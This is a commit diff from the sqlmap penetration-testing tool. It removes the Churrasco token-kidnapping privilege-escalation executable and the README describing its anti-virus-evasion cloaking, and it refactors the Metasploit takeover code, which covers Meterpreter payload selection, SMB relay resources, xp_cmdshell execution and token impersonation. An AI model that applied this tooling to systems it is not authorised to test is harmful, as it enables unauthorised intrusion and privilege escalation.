Get rid of Churrasco (Token kidnapping technique to --priv-esc). Reasons why:

1. there's kitrap0d (MS10-015) which is far more reliable, just recently fixed 2. works only to priv esc basically on MSSQL when it runs as NETWORK SERVICE and the machine is not patched against MS09-012 which is "rare" (hopefully) nowadays. Now sqlmap relies on kitrap0d and incognito to privilege escalate the database process' user privileges to SYSTEM, both via Meterpreter. Minor layout adjustments.
2025-12-29 02:49:01 +00:00 · 2010-03-12 22:43:35 +00:00
parent 6b1ae62753
commit 7d8cc1a482
7 changed files with 21 additions and 94 deletions
--- a/lib/contrib/tokenkidnapping/Churrasco.exe_
+++ b/lib/contrib/tokenkidnapping/Churrasco.exe_
--- a/lib/contrib/tokenkidnapping/README.txt
+++ b/lib/contrib/tokenkidnapping/README.txt
@@ -1,11 +0,0 @@
-Due to the anti-virus positive detection of executable stored inside this
-folder, we needed to somehow circumvent this. As from the plain sqlmap
-users perspective nothing has to be done prior to its usage by sqlmap, but
-if you want to have access to the original executable use the decrypt
-functionality of the ../extra/cloak/cloak.py utility.
-
-To prepare the executable to the cloaked form use this command:
-python ../extra/cloak/cloak.py -i Churrasco.exe
-
-To get back the original executable use this:
-python ../extra/cloak/cloak.py -d -i Churrasco.exe_
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -352,8 +352,7 @@ def cmdLineParser():
                                 "exploitation")

        takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
-                            help="User priv escalation by abusing Windows "
-                                 "access tokens")
+                            help="Database process' user privilege escalation")

        takeover.add_option("--msf-path", dest="msfPath",
                            help="Local path where Metasploit Framework 3 "
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -185,7 +185,7 @@ class Metasploit:
        elif kb.os == "Windows" and encode:
            return self.__skeletonSelection("payload encoding", self.__msfEncodersList)

-    def __selectPayload(self, askChurrasco=True):
+    def __selectPayload(self):
        if kb.os == "Windows" and conf.privEsc:
            infoMsg  = "forcing Metasploit payload to Meterpreter because "
            infoMsg += "it is the only payload that can be used to "
@@ -249,19 +249,7 @@ class Metasploit:

                            break

-                        elif not askChurrasco:
-                            logger.warn("beware that the VNC injection might not work")
-
-                            break
-
                        elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
-                            uploaded = self.uploadChurrasco()
-
-                            if not uploaded:
-                                warnMsg  = "beware that the VNC injection "
-                                warnMsg += "might not work"
-                                logger.warn(warnMsg)
-
                            break

                    elif not choice.isdigit():
@@ -312,12 +300,12 @@ class Metasploit:
    def __selectConnection(self):
        return self.__skeletonSelection("connection type", self.__msfConnectionsList)

-    def __prepareIngredients(self, encode=True, askChurrasco=True):
+    def __prepareIngredients(self, encode=True):
        self.connectionStr  = self.__selectConnection()
        self.lhostStr       = self.__selectLhost()
        self.rhostStr       = self.__selectRhost()
        self.portStr        = self.__selectPort()
-        self.payloadStr     = self.__selectPayload(askChurrasco)
+        self.payloadStr     = self.__selectPayload()
        self.encoderStr     = self.__selectEncoder(encode)

        if self.payloadStr == "linux/x86/shell":
@@ -350,7 +338,7 @@ class Metasploit:
    def __forgeMsfConsoleResource(self):
        self.resourceFile = os.path.join(conf.outputPath, self.__randFile)

-        self.__prepareIngredients(encode=False, askChurrasco=False)
+        self.__prepareIngredients(encode=False)

        self.__resource  = "use windows/smb/smb_relay\n"
        self.__resource += "set SRVHOST %s\n" % self.lhostStr
@@ -426,9 +414,6 @@ class Metasploit:

        cmd = "%s &" % self.exeFilePathRemote

-        if self.cmdFromChurrasco and kb.stackedTest:
-            cmd = "%s \"%s\"" % (self.churrascoPath, cmd)
-
        if kb.dbms == "Microsoft SQL Server" and kb.stackedTest:
            cmd = self.xpCmdshellForgeCmd(cmd)

@@ -462,7 +447,7 @@ class Metasploit:
            infoMsg  = "displaying the list of Access Tokens availables. "
            infoMsg += "Choose which user you want to impersonate by "
            infoMsg += "using incognito's command 'impersonate_token' if "
-            infoMsg += "'getsystem' did not success to elevate privileges"
+            infoMsg += "'getsystem' does not success to elevate privileges"
            logger.info(infoMsg)

            proc.stdin.write("list_tokens -u\n")
@@ -534,7 +519,7 @@ class Metasploit:
        self.__shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)

        self.__initVars()
-        self.__prepareIngredients(encode=encode, askChurrasco=False)
+        self.__prepareIngredients(encode=encode)
        self.__forgeMsfPayloadCmd(exitfunc, format, self.__shellcodeFilePath, extra)

        logger.debug("executing local command: %s" % self.__payloadCmd)